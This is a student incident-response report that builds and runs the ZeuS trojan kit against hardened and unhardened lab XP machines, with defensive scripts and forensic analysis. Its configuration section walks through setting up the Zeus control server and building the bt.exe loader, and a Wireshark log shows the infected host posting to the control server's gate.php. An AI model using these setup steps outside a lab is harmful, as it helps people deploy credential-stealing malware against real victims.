CIS 6395 Incident Response Technologies
How effective are Do-It-Yourself Trojan Kits
(i.e. ZeuS Builder)
By Kevin Kerkvliet
Abstract
A demonstration of how critical operating resources can be exploited was tested.
There are many agencies that have security personnel and procedures in place in order to
grant computing devices the authority to operate within a certain security classification and
to process certain sensitive data. The goal was to discover the effectiveness of the tools used
to hack the common computer and the protected DoD computer. Furthermore, the common
countermeasures deployed to provide protection against the attacks were observed and
examined. Through the use of an Attacker computer and a Victim computer on the network,
the possible functions of ZeuS Builder were examined for their capability. The tool used for
the attack methods against the Victim computer proved to be simple to use but hard to
configure. There are many obstacles in obtaining the software package and it has very little
useful documentation on how to use it. Testing iterations were done to cover different levels
of protection. The differing levels of protection of the victim were configured within
VirtualBox in order to perform this exercise.
The following are the levels for the Victim:
Standard XP OS (no service pack) and no AV
Standard XP OS (no service pack) with AV
Standard XP OS (service pack 3) with installed updates and no AV
Standard XP OS (service pack 3) with installed updates and AV
Hardened XP OS with updates and AV at low classification level
Hardened XP OS with updates and AV at high classification level
The Attacker platform was a personal web server and used strictly within the boundaries of
this educational experiment.
The DoD Gold Disk [1] security utility was used to help harden the OS in two of the
scenarios. Retina [2] will be shown within this report; however, it was not executed after the
realization that security hardening of the operating system is not the primary defense. The
primary defense is a good antivirus and good user awareness training. The digital forensic
tools used for this experiment were IDA Pro 5 [3] and Wireshark [4]. Other tools used were
secondary choices. They are reported in the sections "Other Quick Analysis" and "Forensics
Analysis". The usefulness of the tools can be determined through this process, along with
their applicability in the effort to find evidence that correlates with the hacking activity.
[1] http://www.disa.mil/services/ia.html
[2] http://www.eeye.com/Retina
[3] http://www.hex-rays.com/idapro/
[4] http://www.wireshark.org
Table of Contents
Project Goal
Gold Disk Preparation
Gold Disk Second System Configuration
Retina Process
Background Information about Zeus
Zeus Configuration
Zeus Attacks
Forensics Analysis
Wireshark
IDA Pro 5
bt.exe
zse.exe
Other Quick Analysis
InCtrl5
Winmerge List dlls
Winmerge Procmon
WinMerge TCPView
Rootkit Revealer
Inspection of the cp.php and gate.php
The Answer is to use the zse.exe to see infection and fix it
Conclusion
References
Project Goal
The goal of this experiment is to execute the malware program Zeus on the XP platform.
The types of actions will be examined to see what can be collected by the web server. The
infected host will be searched for the impacts of the client-side malware. Digital forensics
tools will be used to find the clues that lead to discovering what is occurring and help
define what the Zeus characteristics are.
The various levels of security on the XP platform will be tried to see whether any
impacts are found for each particular security type. Tools will be used to assist in
configuring XP to the various levels. The DoD build will be part of this experiment.
There is a concept of "script kiddie" kits that can make the average computer user as
dangerous as the professional hacker. This experiment is going to tell how accurate this is in
the case of the Zeus system. Zeus is a software kit with some configuration and some pricing
options for the extra features. The user ability level required, from easy through moderate to
difficult, will be a subjective rating.
Any discovered countermeasures will be considered and reported to show that perhaps
this Zeus system could be prevented. Special or normal information assurance
(confidentiality, integrity, and availability [CIA]) principles or practices should be
considered.
Gold Disk Preparation
Gold Disk has three Asset Posture benchmarks that you can use to harden your
system to. You can select from Mission Critical, Mission Support or Administrative. There is
a subcategory of Classified, Public or Sensitive. For this exercise I used Administrative and
Public for one trial and then Mission Critical and Classified for another trial.
Once the selection is made you click on Evaluate Asset and it will go through all the
scripts looking for vulnerabilities at that selected level. After the scripts have run you will get
a report with the open vulnerabilities within categories of CAT I (Red), CAT II (Orange), CAT
III (Yellow), and Green if the item was already taken care of.
In the figure below is the initial screen before evaluation is performed.
This shows the baseline assessment being executed.
This is the result of the program, showing how many open issues there are to solve.
From the report for a system with XP SP3 (with all recent Windows updates) with
Symantec Endpoint Ver 11 there are still twelve CAT I and one hundred ninety-two CAT II
findings. The CAT III/IV findings are very small in risk and by DoD policy can be mitigated
by other security policies that reduce or eliminate the vulnerability finding. In this system
there are twenty-nine CAT III findings.
The next step is to go through the process of fixing the OS to the point where there are
no CAT I and CAT II findings. There are some automatic ways to do this; however, it is a
manual process to step through the Gold Disk a few times, because there is a possibility you
could lock the system down to the point where it is unusable and worthless. You want to take
the extra time and record the steps performed in case you need to back out of them. There is a
Remediate button to push to continue the process.
Once you have run all the scripts for the first iteration you have to rerun the Gold Disk
utility and see which findings are still open and which ones require manual configuration
changes that the scripts were unable to make. The remaining steps are to rerun the process
until you have successfully closed the findings and the report comes back green with no
CAT I and CAT II findings. The unknown category is related to network policies and best
practices documentation showing the posture of the system and network architecture. There
are some unknown findings that need to be assessed by a person and certified as having been
done correctly.
You must select the directory tree to expand the section you are trying to fix. It is color coded
so you can easily find the security holes to fix.
The next thing that happens is that the box of scripts pops up to fix the problems for you.
More scripts, showing how they change the registry for you.
The example shows the Passwords section and the categories within it to be fixed.
The scripts that will be run for securing the password issues.
Below are more scripts showing other system modifications of the registry.
After the first iteration of this process there are three CAT I and forty CAT II findings.
Iteration Results   CAT I   CAT II   CAT III   CAT IV   Closed   Unknown
Baseline            12      192      29        0        242      204
First               3       40       6         0        426      204
Guidance on how to close a finding is given by selecting the finding in question and
reviewing the details of the item. The Description, Discussion, Details, Detection,
Remediation, Notes, Impact/Mitigation and Misc tabs each give a section of information that
can be used to reach the desired effect, assisting the user in securing the vulnerability.
The Local Security Settings utility from the Administrative Tools in the Control Panel
will help change the system settings. NSA also provides security templates and a policy editor
to make these changes all at once, but I am doing it manually since I am only doing it once for
this project. In a batch I would take my template from the first machine I configure and apply
it to the rest of the like machine assets. Using the Windows Microsoft Management Console
(MMC), started by typing mmc in the Run box, will give the tool sets required to make
modifications to the system. You add the modules to the MMC and then change the settings as
directed by Gold Disk. If you want to work on the fly and not make a reusable template,
then you can execute the policy editor by entering gpedit.msc from the Run command and
make the manual changes as seen appropriate. REGEDIT also needs to be used, since the
templates can't do it all. Some folder security permissions will be modified with REGEDIT.
Below is an example of the Details for the CAT I finding under Accounts.
Below is an example of the Remediation for how to manually fix the problem.
Gold Disk is running scripts and using generic network strategies suggested by the
experts that will differ from the unique network you configure. You will see some
false positives come back from the utility. Normally when a false positive is found you have
to report it and justify why it is considered to be one. Your security
documentation will show that there is a proper check in place to deal with the flaws or, when
you get that case, that they aren't valid findings. In this case I have a few, such as "User Right / II /
User Rights Assignments- Administrators have auditing rights." I am not going to create an
Auditors group, so this is alright for this finding. There will not be any impacts for the purpose
of this experiment. It would be documented as such and put into the policy for approval.
After the second iteration of running the Gold Disk, the result of closing the open
findings gets you to a solution that is almost complete. There are zero CAT I findings, two
CAT II findings, zero CAT III findings, zero CAT IV findings and one hundred sixty
unknown findings. The unknown findings are mixtures of all CAT I/II/III/IV levels.
While looking into the unknown items you will see that eighteen are related to antivirus (AV).
Those AV ones are not relevant since an approved DoD AV was installed and configured to
meet the manual checks required here. One "Accounts" finding was unknown and related to a
manual check ensuring passwords are fifteen characters and changed at least once a year.
It has you use DUMPSEC to check this finding. The passwords were compliant with this CAT
II finding. One "Auditing" finding was unknown and required manual registry modification to
ensure failure audits were being done correctly. Documentation becomes a big portion of this
validation process.
Below is the summary of the second iteration.
There are thirty-four "IAVM-A" unknown findings related to patches that need to be
verified manually. All are CAT I findings except nine that are CAT II. There are fifty-four
"IAVM-B" unknown findings. I noticed many are false positives, meaning that the
findings are flagged for software that is not installed on the system. There are twenty-nine
"IAVM-T" unknown findings. There are nineteen Manual findings that require you to look
into policy documentation or known checks that can't be automatically detected. This requires
interviewing the system administrator to discover how the vulnerability is being managed.
There are two "Misc Security Updates" unknown findings that are just simple management
issues. There are two "Patches" unknown findings that are related to patch management and
network security mitigation for firewall usage. There are two "Security Options" unknown
findings that are not important to check (display banner and printer sharing). There are two
CAT III Services unknown findings which ask to make sure games and MSN are removed.
There are twelve "USB Devices" unknown findings that discuss the security posture and use
of USB devices within the system. There are two "Windows Firewall" unknown findings that
are simple registry CAT III checks.
This table is a summary of the unknown findings and what CAT they belong to.
Category                CAT I   CAT II   CAT III   Unknown Total
Antivirus               4       12       3         19
Desktop Application     2       16       8         26
Accounts                        1                  1
Auditing                        1                  1
IAVM-A                  25      9                  34
IAVM-B                  30      24                 54
IAVM-T                  8       20       1         29
Manual                  5       11       3         19
Misc Security Updates           2                  2
Patches                         2                  2
Security Options                1        1         2
Services                                 2         2
USB Devices             1       2        9         12
Windows Firewall                         2         2
Totals                  75      101      29        205
Gold Disk Second System Configuration
The low security option is very similar to the high class one.
From the report for a system with XP SP3 (with all recent Windows updates) with
Symantec Endpoint Ver 11 there are eleven CAT I and one hundred ninety-three CAT II
findings. The CAT III/IV findings are very small in risk and by DoD policy can be mitigated
by other security policies that reduce or eliminate the vulnerability finding. In this system
there are twenty-nine CAT III findings. This is similar to the higher classification system.
This table shows the difference between the high level and the low level after the baseline
assessment is executed.
Asset Posture     CAT I   CAT II   CAT III   CAT IV   Unknown
I- Classified     12      192      29        0        204
III- Public       11      193      29        0        201
Below is after running the first iteration of the Gold Disk.
Below is the resultant low classification of the Gold Disk process.
Retina Process
Retina is a very intensive registry scanner and ensures that settings are flagged based
on the optional audits selected. Retina, for this experiment, would not add any value
unless our Gold Disk failed to provide protection from the Zeus attack. In DoD practice
Retina would be used after the Gold Disk is executed. This is a double check of the integrity
of the hardening process. The use of more than one optimal tool is a good practice to employ
and is often done for DoD systems. I have simple documentation of the setup and practical
issues of Retina; however, I did not provide summary results for this exercise.
Retina is pretty simple to use. You need some configuration to be properly
implemented in order for the scanning engine to access the files, but after that it is a couple of
buttons and a report that shows you each finding and some help on how to close
it. Just like Gold Disk and other applications there are flaws and false positives to consider
when doing the analysis of the reports.
The key is to configure the server and client machines properly.
1. Credentials
a. Use Domain Administrator credentials, or local admin credentials for the target
machine.
b. Verify that the password you are using is correct.
c. Remember to include the domain if necessary. Enter credentials into Retina as
DOMAINNAME\USERNAME
2. Services
a. Make sure that the "Server" service and "Remote Registry" service are running
on both the scanner and target machines.
3. Ports
a. Make sure that you can ping the target machine from the scanner.
b. From a command prompt execute netstat -an and make sure that the following
ports are listening:
i. TCP 135, UDP 137, TCP 139 and TCP 445
4. Local Security Policy
a. Verify that the NTLM settings are the same for both the scanner and the target.
To do this:
i. Go to Start -> Control Panel -> Administrative Tools -> Local Security
Policy
ii. Under Local Policies go to Security Options
iii. Open the policy "Network security: LAN Manager authentication"
iv. Verify that the NTLM setting is the same for both scanner and target.
If not the same, change the setting so that they are equal.
5. Simple File Sharing
a. If scanning Windows XP target, you must turn on Simple File Sharing. To do
this:
i. Open Windows Explorer. Go to Tools -> Folder Options.
ii. Select the View tab and scroll down to "Simple File Sharing" and make
sure it is selected.
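Steps 2 and 3 above can be verified from command output before a scan is queued. The script below is an added example written for this page; it is not part of the report or of Retina. It parses captured "netstat -an" and "sc query" output and lists the prerequisites that are not met. The netstat and sc output embedded in it is constructed for the example; the service names LanmanServer and RemoteRegistry are the names under which the "Server" and "Remote Registry" services appear in sc query output.

```python
import re

# Ports Retina needs to reach on the target (report step 3b), as (proto, port).
REQUIRED_PORTS = {("TCP", 135), ("UDP", 137), ("TCP", 139), ("TCP", 445)}
# Services that must be running on scanner and target (report step 2a):
# "Server" is LanmanServer and "Remote Registry" is RemoteRegistry in sc query.
REQUIRED_SERVICES = {"LanmanServer", "RemoteRegistry"}

# Constructed sample of `netstat -an` output from an XP host; not a real capture.
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    192.168.1.109:139      0.0.0.0:0              LISTENING
  TCP    192.168.1.109:1034     192.168.1.5:80         ESTABLISHED
  UDP    192.168.1.109:137      *:*
  UDP    0.0.0.0:445            *:*
"""

# Constructed sample of `sc query <name>` output for the two services, concatenated.
SAMPLE_SC_QUERY = """\
SERVICE_NAME: LanmanServer
        TYPE               : 20  WIN32_SHARE_PROCESS
        STATE              : 4  RUNNING

SERVICE_NAME: RemoteRegistry
        TYPE               : 20  WIN32_SHARE_PROCESS
        STATE              : 1  STOPPED
"""

NETSTAT_RE = re.compile(r"^\s*(TCP|UDP)\s+(\S+):(\d+)\s+(\S+)(?:\s+(\S+))?\s*$")
SERVICE_RE = re.compile(r"SERVICE_NAME:\s*(\S+)")
STATE_RE = re.compile(r"STATE\s*:\s*\d+\s+([A-Z_]+)")


def bound_ports(netstat_text):
    """Return the set of (proto, port) that are listening (TCP) or bound (UDP)."""
    found = set()
    for line in netstat_text.splitlines():
        m = NETSTAT_RE.match(line)
        if not m:
            continue
        proto, _addr, port, _foreign, state = m.groups()
        # UDP lines carry no state column; any bound socket counts.
        if proto == "TCP" and state != "LISTENING":
            continue
        found.add((proto, int(port)))
    return found


def service_states(sc_text):
    """Map service name -> state word from concatenated `sc query` output."""
    states = {}
    current = None
    for line in sc_text.splitlines():
        m = SERVICE_RE.search(line)
        if m:
            current = m.group(1)
            continue
        m = STATE_RE.search(line)
        if m and current:
            states[current] = m.group(1)
    return states


def preflight(netstat_text, sc_text):
    """List the prerequisites that are not met; an empty list means ready to scan."""
    problems = []
    for proto, port in sorted(REQUIRED_PORTS - bound_ports(netstat_text)):
        problems.append(f"{proto} {port} is not listening")
    states = service_states(sc_text)
    for name in sorted(REQUIRED_SERVICES):
        if states.get(name) != "RUNNING":
            problems.append(f"service {name} is {states.get(name, 'not found')}")
    return problems


if __name__ == "__main__":
    for p in preflight(SAMPLE_NETSTAT, SAMPLE_SC_QUERY):
        print("FAIL:", p)
```

On a real scanner or target you would paste the output of "netstat -an", "sc query LanmanServer" and "sc query RemoteRegistry" in place of the two samples; the NTLM and Simple File Sharing checks (steps 4 and 5) are registry and Explorer settings and are left to the manual procedure above.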
In the program the first step is to select your target IP
The next step is to select the audit type you want to execute. This part is the ports.
This part is the type of OS Audits.
This shows how to put in the credentials correctly for the target client.
This shows the job in the queue and running.
The next procedures would be to review the output files and rerun the utility until the
desired reporting shows the system is clear of any findings. After a Gold Disk execution
Retina can still find open findings; however, there usually aren't that many. It is a good tool to
use in practice and makes regular maintenance easier for keeping the network devices
compliant over time.
Background Information about Zeus
There are some interesting publications out there about Zeus or a variant of it; however,
the practical information is not shared or may not be accurate. I could not find anything
representing just the facts, only the opinions of authors who may or may not be technical IT
gurus. Then the publishing companies' lawyers probably stripped a lot of the key information
to protect themselves from potential lawsuits. When looking at the PHP source code of the
program I found a lot of Russian words throughout the whole code of the program. The
best source of information may be either classified or underground, hiding in the black
markets or other foreign markets where they don't have laws against software piracy or
hacking. So I found some generic opinions from the Internet which may hold some weight but
are not fundamentally sound.
Dell owns a website called http://www.secureworks.com and published an article
on Zeus on March 11, 2010 [5]. They called the program a banking Trojan that "steals data from
infected computers via web browsers and protected storage." The website is very thorough in
explaining what the program does and how it works. The latest version Dell knew of was Zeus
1.3.4.x. I found a couple of variants on forums but the only working version was Zeus 1.2.7.19,
which was the same as the version from Dell's report. Dell gives a good explanation of the
variant numbering system. The major concern is that the countermeasure used to detect this
malware is the AV, and it may be easily overcome. According to Dell the next version, 1.4,
has polymorphic encryption.
[5] http://www.secureworks.com/research/threats/zeus/?threat=zeus
"The 1.4 version of ZeuS will enable the ZeuS Trojan to re-encrypt itself each time it
infects a victim, thus making each infection unique. The 1.4 version also enables the
ZeuS file names to be randomly generated, thus each infection will contain different
file names. This will make it very difficult for anti-virus engines to identify the ZeuS
Banking Trojan on the victims' system." - Dell
With this kind of technology in place it is very difficult to put effective
countermeasures in place to protect users from the malware.
The table below summarizes Dell's information about the variant numbering.
a.b.c.d
a(1) - a complete change in the bot. This has never changed from 1.
b(3) - Major changes that cause complete or partial incompatibility with the previous versions. Recently we
moved from version 2 to version 3.
c(2) - This is for bug fixes, improvements, and adding features.
d(1) - This for a small revision in the code to make the malware undetectable by AV vendors.
The main functions that Dell says the Zeus program performs are listed below.
Steals data submitted in HTTP forms
Steals account credentials stored in the Windows Protected Storage
Steals client-side X.509 public key infrastructure (PKI) certificates
Steals FTP and POP account credentials
Steals/deletes HTTP and Flash cookies
Modifies the HTML pages of target websites for information stealing purposes
Redirects victims from target web pages to attacker controlled ones
Takes screenshots and scrapes HTML from target sites
Searches for and uploads files from the infected computer
Modifies the local hosts file (%systemroot%\system32\drivers\etc\hosts)
Downloads and executes arbitrary programs
Deletes crucial registry keys, rendering the computer unable to boot into Windows
The concept of how it works is pretty simple. A web server with a MySQL database
for saving captured information is out on the Internet somewhere. Then there is an executable
file that is sent to an unsuspecting victim by some kind of scheme, like opening up an
unknown mail attachment, which installs a Trojan program. Once the program is running on
the victim's machine it will start sending the types of information that the web server is
listening for and recording into its database. In my experiment I didn't see success in my
database like Dell did.
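Of the functions listed above, modification of the hosts file is one a defender can check on the infected host without any of the kit's own tools. The script below is an added example written for this page, not part of the report or of any Zeus analysis tool: it parses a hosts file, flags names pointed at public addresses (the redirection pattern) and non-localhost names pinned to loopback (the update-blocking pattern), and runs on a constructed hosts file that uses TEST-NET addresses and .test domains as stand-ins. The path helper uses the location quoted in the list above.

```python
import ipaddress
import os

# RFC 1918 ranges: a name pointed at one of these is an internal override,
# not an Internet redirection, so it is not flagged.
PRIVATE_NETS = [ipaddress.ip_network(n)
                for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
LOCAL_NAMES = {"localhost", "localhost.localdomain"}

# Constructed sample hosts file. 203.0.113.0/24 (TEST-NET-3) stands in for a
# public attacker-controlled address; nothing here is a real indicator.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-1999 Microsoft Corp.
127.0.0.1       localhost
::1             localhost
203.0.113.45    www.examplebank.test
203.0.113.45    online.examplebank.test   # constructed redirect
127.0.0.1       update.example-av.test
10.0.0.5        intranet.corp.test
"""


def parse_hosts(text):
    """Yield (ip, name) for every mapping, ignoring comments and blank lines."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        try:
            ip = ipaddress.ip_address(parts[0])
        except ValueError:
            continue  # malformed line; a stricter audit might flag it
        for name in parts[1:]:
            yield ip, name.lower()


def classify(ip, name):
    """Return a finding kind for one mapping, or None if it looks benign."""
    if ip.is_loopback:
        return None if name in LOCAL_NAMES else "sinkholed-to-loopback"
    if ip.is_link_local or any(ip in net for net in PRIVATE_NETS):
        return None
    return "redirect-to-public"


def audit_hosts(text):
    """Return [(kind, ip, name)] for every suspicious mapping in a hosts file."""
    findings = []
    for ip, name in parse_hosts(text):
        kind = classify(ip, name)
        if kind:
            findings.append((kind, str(ip), name))
    return findings


def windows_hosts_path():
    r"""Path quoted in the report: %systemroot%\system32\drivers\etc\hosts."""
    root = os.environ.get("SYSTEMROOT", r"C:\Windows")
    return os.path.join(root, "system32", "drivers", "etc", "hosts")


if __name__ == "__main__":
    for kind, ip, name in audit_hosts(SAMPLE_HOSTS):
        print(f"{kind:22} {ip:16} {name}")
```

To run it against a live XP host, read windows_hosts_path() and pass the contents to audit_hosts(); a baseline hash of the file taken after imaging makes the check even simpler, since any change at all is worth a look on a host that should not be editing its own name resolution.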
Zeus Configuration
The first step of the configuration was to find a good source for the files, which will not
be disclosed in this report. There are two parts to the Zeus system. There is a client program
that is used to help configure a "cfg.bin" and a "bt.exe" file. The GUI of this program is
basic and has simple functions to detect whether the virus is present, to clean the virus, and to
generate the virus. The second part of the Zeus system is the web server portion, whose
primary focuses are data collection and command and control of acquired systems.
The web server files were packed in a file called upload.zip, which contained the required
files to set up the web host. The file was uploaded to a host web server with MySQL services.
The upload.zip file was unpacked and ready to execute online after the proper database and
database user account were established for Zeus.
You also have to change the permissions on the file folder structure to 777 to give complete
access for the program to install and run correctly.
Afterwards you go to the browser and enter the correct path to the install file, and it opens up a
PHP form. The correct path is "install/index.php" and the automatic form to complete is
shown below.
In this case I used ucf as the database name and user account name. You also need to use the
provided encrypted key to protect the program and data. After the Install button is clicked it
will automatically configure the web server system for the proper Zeus web services and
generate all the database files and tables for storing the collection that the
Trojan client program sends to it. It will take a few seconds to complete. The web
browser will give you a status of the items it just completed. After inspection of the web
server database contents and file folder contents you will observe what the
"install/index.php" script has just completed for you automatically. Below are the status
screenshot and a listing of the database tables just created in this step.
Finally you are all set up for capturing and storing the data for the Zeus system. You can
log into the web server on the web host to view the command and control GUI, which will also
give you the status of your captured systems reporting to this web server over the Internet.
The client side of the Zeus system is the utility that configures the malware and
detects and cleans the Zeus virus from the client machine. Once you open the program utility
you will get the default Information screen stating whether it detects the virus or not, and a
button to clean it if needed. Upon the need to clean it you will have to restart the computer. The
Builder tab gives the option to make the malware. You click on the "Edit Config" button and get
to modify the default config.txt file to meet your needs. I selected "Replace_All" and replaced it
with the correct path to the web host as seen below.
After inspecting the config.txt like in the picture above, you will find that the link underneath
the highlighted area requests a file called "ip.php." I could not find that file in the web
server file directory or in the package files from the source I received the files from. It may
be the reason why my web server hasn't received any of the traffic from the infected host in
my trials and why my database remains empty. Moving forward with a ninety percent
solution, we will save the text file and close it. The next step is to click on the "Build Config"
button; you will see the utility run its procedures and create a "cfg.bin" file that will be used on
the web server for a complete web configuration. Below are sample screenshots
demonstrating this.
Once that is complete you will upload this "cfg.bin" file to the web server underneath the
same directory the other Zeus files are residing in. In theory it should work, but there is that one
missing file that I could not decipher or find as part of this configuration.
The remaining step to complete is to click on the "Build loader" button to make the malware
executable. This is seen in the screenshot below.
The "bt.exe" file is created, and then you have to craft a unique scheme to pass it around to
potential victims to execute. It was uploaded to the web server for simple download access by
the host computers for this experiment.
Zeus Attacks
The attacks were very simple to execute by accessing the link from the web server in
this experiment. There was no elaborate scheme to mask the malware file. It was simply
downloaded and run where possible. The following screenshots are shown as impacted or not
impacted to give a quick overview of this experiment. The behavior of each
preconfigured system makes it obvious whether the "bt.exe" malware affected the system or
not.
Standard XP with no service packs or AV - Not Impacted
Standard XP with no service packs and has AV - Not Impacted
Standard XP OS with SP3 and Windows Updates and AV - Not Impacted
Standard XP OS with SP3 and Windows Updates and no AV - Impacted
After a manual reboot this impact caused a blue screen of death that continued in a loop.
Hardened XP OS Low Class with SP3 and Windows Update with AV - Not Impacted
Hardened XP OS High Class with SP3 and Windows Update with AV - Not Impacted
The following table is the summary of the screen shots.
OS Configuration                                                 Impacted / Not Impacted
Standard XP with no service packs or AV                          Not Impacted
Standard XP with no service packs and has AV                     Not Impacted
Standard XP OS with SP3 and Windows Updates and AV               Not Impacted
Standard XP OS with SP3 and Windows Updates and no AV            Impacted
Hardened XP OS Low Class with SP3 and Windows Update with AV     Not Impacted
Hardened XP OS High Class with SP3 and Windows Update with AV    Not Impacted
We can see that the malware "bt.exe" file only impacted one of the OS configurations. From
this we can see that AV with an updated signature plays an important role in discovering
and preventing this version of the malware, and that somewhere between no service
pack and the latest updates an open vulnerability became available for this malware version
to take advantage of.
Forensics Analysis
For the discovery of what was going on behind the scenes, the tools Wireshark, IDA
Pro 5.0, PEiD, Ultimate Packer for Executables (UPX) and the ones listed in the section
"Other Quick Analysis" were used to gather the details of the malware. In addition the PHP
source code was examined for clues.
From the simple use of the PEiD packer checking utility we see whether the "bt.exe" file
or the client utility executable "zse.exe" is packed. We see that the "bt.exe" file is not
packed, since it returned "Nothing found *." Therefore we do not have to worry
about the IDA Pro 5 tool not getting to all of the assembly language code. It won't get lost in an
unrecognized compression algorithm.
When looking at the client utility executable we see it is packed. The next step was to unpack
it. PEiD shows "UPX 0.89.6 - 1.02 / 1.05 - 2.90 -> Markus & Laszlo" as the packer type and
version. So the correct procedure to unpack the file is to get the same packer type, compatible
with the information discovered.
With the UPX tool I unpacked the "zse.exe" client builder utility and prepared it to be
examined by IDA Pro.
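PEiD's verdict above rests on two observations a defender can reproduce without it: the names in the PE section table (UPX leaves UPX0/UPX1) and the byte entropy of each section, which sits near 8 bits per byte when the section holds compressed or encrypted data. The script below is an added example written for this page, not part of the report, PEiD or UPX. It parses the DOS header, PE signature, COFF header and section table with the standard library, and reports "UPX", "packed-unknown" (high-entropy section with ordinary names) or "none". Because no real binary can be embedded here, it also builds three minimal, non-runnable PE images as constructed specimens; the 7.0-bit threshold is an assumption of the example, not a PEiD rule.

```python
import math
import random
import struct
import sys


def entropy(data):
    """Shannon entropy in bits per byte; packed or encrypted data sits near 8.0."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_sections(pe):
    """Walk DOS header -> PE signature -> COFF header -> section table.

    Returns a list of (name, pointer_to_raw_data, size_of_raw_data).
    """
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]   # SizeOfOptionalHeader
    table = coff + 20 + opt_size
    sections = []
    for i in range(num_sections):
        hdr = pe[table + 40 * i:table + 40 * (i + 1)]
        name = hdr[:8].rstrip(b"\0").decode("ascii", "replace")
        raw_size, raw_ptr = struct.unpack_from("<II", hdr, 16)  # SizeOfRawData, PointerToRawData
        sections.append((name, raw_ptr, raw_size))
    return sections


def packer_verdict(pe):
    """'UPX' on UPX section names, 'packed-unknown' on a high-entropy section, else 'none'."""
    sections = parse_sections(pe)
    if any(name.upper().startswith("UPX") for name, _, _ in sections):
        return "UPX"
    worst = max((entropy(pe[ptr:ptr + size]) for _, ptr, size in sections if size),
                default=0.0)
    return "packed-unknown" if worst > 7.0 else "none"


def build_fake_pe(sections):
    """Constructed specimen builder: a minimal PE image with the given (name, payload)
    sections, no optional header, no imports and no entry point. It cannot execute."""
    header_len = 64 + 4 + 20 + 40 * len(sections)
    data_start = (header_len + 511) // 512 * 512
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                      # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0, 0)
    table, body, ptr = b"", b"", data_start
    for name, payload in sections:
        table += struct.pack("<8sIIIIIIHHI", name.encode("ascii"), len(payload), 0x1000,
                             len(payload), ptr, 0, 0, 0, 0, 0x60000020)
        body += payload
        ptr += len(payload)
    return (bytes(dos) + b"PE\0\0" + coff + table).ljust(data_start, b"\0") + body


_rng = random.Random(7)
# Constructed specimens: a UPX-style layout, an obviously unpacked image, and a
# packed image whose packer renamed its sections to look ordinary.
SAMPLE_UPX = build_fake_pe([("UPX0", b"\0" * 512),
                            ("UPX1", bytes(_rng.randrange(256) for _ in range(4096))),
                            (".rsrc", b"R" * 256)])
SAMPLE_PLAIN = build_fake_pe([(".text", b"\x90" * 2048 + b"\xC3"),
                              (".data", b"hello world " * 100)])
SAMPLE_RENAMED = build_fake_pe([(".text", bytes(_rng.randrange(256) for _ in range(4096)))])

if __name__ == "__main__":
    for path in sys.argv[1:]:
        with open(path, "rb") as fh:
            data = fh.read()
        print(path, packer_verdict(data), [s[0] for s in parse_sections(data)])
```

Run it with the paths of the executables under examination as arguments. The third specimen is the case PEiD's signature scan misses: once a packer is configured to rename its sections, only the entropy check still fires, which is why both tests belong in a triage script.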
Wireshark
The Wireshark analysis started with capturing the interface from a Mac OS machine and
processing the capture for a period of nine hours and forty-five minutes after the
execution of the "bt.exe" infection took place on the OS configuration "Standard XP OS with
SP3 and Windows Updates and no AV." The capture file was filtered to display only the
traffic from the infected host to the web server. The filter used in Wireshark was "ip.dst ==
xxx.xxx.xxx.xxx && ip.addr eq 192.168.1.109" where xxx.xxx.xxx.xxx is the web server
address, masked in this report. It is a valid public web hosting IP address.
The summary statistics are shown below.
Below is a sample of the Wireshark line summary from the host to the web server to give you a
pattern of what is happening between the infected host and the web server.
No. Time Source Destination Protocol NT SMBs Info
10 0.671484 192.168.1.109 xx.xxx.xxx.xx TCP clvm-cfg > http [FIN, ACK] Seq=1 Ack=1 Win=64858 Len=0
12 0.818177 192.168.1.109 xx.xxx.xxx.xx TCP ica > http [SYN] Seq=0 Win=65535 Len=0 MSS=1460 SACK_PERM=1
27 1.117772 192.168.1.109 xx.xxx.xxx.xx TCP ica > http [ACK] Seq=1 Ack=1 Win=65535 Len=0
28 1.118682 192.168.1.109 xx.xxx.xxx.xx HTTP GET /ucf/cp.php HTTP/1.0
41 1.495183 192.168.1.109 xx.xxx.xxx.xx TCP ica > http [ACK] Seq=198 Ack=679 Win=64858 Len=0
42 1.499518 192.168.1.109 xx.xxx.xxx.xx TCP ica > http [FIN, ACK] Seq=198 Ack=679 Win=64858 Len=0
43 1.500482 192.168.1.109 xx.xxx.xxx.xx TCP cvc > http [SYN] Seq=0 Win=65535 Len=0 MSS=1460 SACK_PERM=1
49 1.803196 192.168.1.109 xx.xxx.xxx.xx TCP cvc > http [ACK] Seq=1 Ack=1 Win=65535 Len=0
50 1.803987 192.168.1.109 xx.xxx.xxx.xx HTTP GET /ucf/cp.php?m=login HTTP/1.0
62 2.199615 192.168.1.109 xx.xxx.xxx.xx TCP cvc > http [ACK] Seq=206 Ack=1774 Win=65535 Len=0
64 2.202123 192.168.1.109 xx.xxx.xxx.xx TCP cvc > http [ACK] Seq=206 Ack=1775 Win=65535 Len=0
65 2.204872 192.168.1.109 xx.xxx.xxx.xx TCP cvc > http [FIN, ACK] Seq=206 Ack=1775 Win=65535 Len=0
66 2.206144 192.168.1.109 xx.xxx.xxx.xx HTTP POST /ucf/gate.php HTTP/1.1
72 2.577154 192.168.1.109 xx.xxx.xxx.xx TCP netmap_lm > http [ACK] Seq=514 Ack=222 Win=65093 Len=0
298 7.471422 192.168.1.109 xx.xxx.xxx.xx TCP liberty-lm > http [SYN] Seq=0 Win=65535 Len=0 MSS=1460 SACK_PERM=1
307 7.583562 192.168.1.109 xx.xxx.xxx.xx TCP liberty-lm > http [ACK] Seq=1 Ack=1 Win=65535 Len=0
